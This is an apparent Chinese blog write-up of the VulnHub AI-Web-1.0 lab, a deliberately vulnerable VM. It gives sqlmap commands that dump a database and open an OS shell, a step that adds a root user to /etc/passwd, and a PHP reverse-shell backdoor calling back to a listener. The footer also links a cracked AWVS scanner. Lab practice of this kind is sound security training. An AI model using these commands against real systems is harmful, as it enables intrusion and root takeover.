VulnHub之AIWeb1.0


一个粗糙的信息收集

使用nmap探测目标主机开放端口

访问robots.txt

访问http://192.168.31.126/se3reTdir777/

猜测可能存在注入点,使用Sqlmap进行探测

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" --dbs


获取数据库中的表

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables


获取systemUser表中的字段名

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T systemUser --columns

获取字段内容

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T systemUser -C "userName,password" --dump


获取user表中内容

在数据库中没有获得有价值的信息
扫一下网站目录,找到一个info.php

访问页面发现是phpinfo

找到网站的物理路径

使用sqlmap获取shell

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell
# 网站路径
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/


查看/etc/passwd权限,发现可以写入

使用卡里自带的openssl加密一下我们自己的账户

写入用户,UID,GID为0,根目录为root

尝试切换到test用户时提示需要一个终端

在本地写一个后门,使用wget下载的靶机

<?php
$sock=fsockopen("192.168.126.233",9966);
exec("/bin/sh -i <&3 >&3 2>&3");
?>


使用python搭建一个HTTP服务器

python -m SimpleHTTPServer 8080


使用wget下载到靶机

执行刚刚上传的文件

看到反弹回来一个shell

使用python创建一个交互式shell

切换用户,查看权限已经是root用户

查看flag

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

扫描二维码

获取更多精彩

NowSec

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值